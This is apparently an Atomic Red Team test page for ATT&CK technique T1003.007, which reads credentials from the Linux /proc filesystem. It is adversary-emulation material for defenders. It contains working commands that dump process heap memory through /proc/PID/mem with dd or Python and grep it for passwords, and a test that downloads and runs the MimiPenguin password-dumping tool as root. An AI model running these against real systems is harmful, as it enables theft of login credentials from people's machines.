# T1003.007 - Proc Filesystem
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)

When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)

If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.

## Atomic Tests

### Atomic Test #1 - Dump individual process memory with sh (Local)
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Script to launch target process must exist

##### Check Prereq Commands:
```sh
test -f /tmp/T1003.007.sh
grep "T1003.007" /tmp/T1003.007.sh

```
##### Get Prereq Commands:
```sh
echo '#!/bin/sh' > /tmp/T1003.007.sh
echo "sh -c 'echo \"The password is T1003.007\" && sleep 30' &" >> /tmp/T1003.007.sh

```

In [ ]:
Invoke-AtomicTest T1003.007 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
sh /tmp/T1003.007.sh
PID=$(pgrep -n -f "T1003.007")
HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
dd if=/proc/"${PID}"/mem of="/tmp/T1003.007.bin" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
grep -i "PASS" "/tmp/T1003.007.bin"
```

In [ ]:
Invoke-AtomicTest T1003.007 -TestNumbers 1

#### Cleanup: 
```sh
rm -f "/tmp/T1003.007.bin"
```

In [ ]:
Invoke-AtomicTest T1003.007 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Dump individual process memory with sh on FreeBSD (Local)
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Script to launch target process must exist

##### Check Prereq Commands:
```sh
test -f /tmp/T1003.007.sh
grep "T1003.007" /tmp/T1003.007.sh

```
##### Get Prereq Commands:
```sh
echo '#!/bin/sh' > /tmp/T1003.007.sh
echo "sh -c 'echo \"The password is T1003.007\" && sleep 30' &" >> /tmp/T1003.007.sh

```

In [ ]:
Invoke-AtomicTest T1003.007 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
sh /tmp/T1003.007.sh
PID=$(pgrep -n -f "T1003.007")
MEM_START=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f1)
MEM_STOP=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f2)
MEM_SIZE=$(echo $(($MEM_STOP-$MEM_START)))
dd if=/proc/"${PID}"/mem of="/tmp/T1003.007.bin" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
strings "/tmp/T1003.007.bin" | grep -i PASS
```

In [ ]:
Invoke-AtomicTest T1003.007 -TestNumbers 2

#### Cleanup: 
```sh
rm -f "/tmp/T1003.007.bin"
```

In [ ]:
Invoke-AtomicTest T1003.007 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Dump individual process memory with Python (Local)
Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Script to launch target process must exist

##### Check Prereq Commands:
```sh
test -f /tmp/T1003.007.sh
grep "T1003.007" /tmp/T1003.007.sh

```
##### Get Prereq Commands:
```sh
echo '#!/bin/sh' > /tmp/T1003.007.sh
echo "sh -c 'echo \"The password is T1003.007\" && sleep 30' &" >> /tmp/T1003.007.sh

```
##### Description: Requires Python

##### Check Prereq Commands:
```sh
(which python || which python3 || which python2)

```
##### Get Prereq Commands:
```sh
echo "Python 2.7+ or 3.4+ must be installed"

```

In [ ]:
Invoke-AtomicTest T1003.007 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
sh /tmp/T1003.007.sh
PID=$(pgrep -n -f "T1003.007")
PYTHON=$(which python || which python3 || which python2)
$PYTHON PathToAtomicsFolder/T1003.007/src/dump_heap.py $PID /tmp/T1003.007.bin
grep -i "PASS" "/tmp/T1003.007.bin"
```

In [ ]:
Invoke-AtomicTest T1003.007 -TestNumbers 3

#### Cleanup: 
```sh
rm -f "/tmp/T1003.007.bin"
```

In [ ]:
Invoke-AtomicTest T1003.007 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Capture Passwords with MimiPenguin
MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). 
Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. 
See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. 
See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})

##### Check Prereq Commands:
```bash
if [ -f "/tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh" ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```bash
wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
mkdir /tmp/mimipenguin
tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin

```
##### Description: Strings must be installed

##### Check Prereq Commands:
```bash
if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```bash
sudo apt-get -y install binutils

```
##### Description: Python2 must be installed

##### Check Prereq Commands:
```bash
if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```bash
sudo apt-get -y install python2       

```
##### Description: Libc-bin must be installed

##### Check Prereq Commands:
```bash
if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```bash
sudo apt-get -y install libc-bin        

```

In [ ]:
Invoke-AtomicTest T1003.007 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `bash`
```bash
sudo /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh > /tmp/T1003.007Test3.txt
cat /tmp/T1003.007Test3.txt
```

In [ ]:
Invoke-AtomicTest T1003.007 -TestNumbers 4

#### Cleanup: 
```bash
rm -f /tmp/T1003.007Test3.txt > /dev/null
```

In [ ]:
Invoke-AtomicTest T1003.007 -TestNumbers 4 -Cleanup

## Detection
To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path <code>/proc/\*/maps</code>, where the <code>\*</code> directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.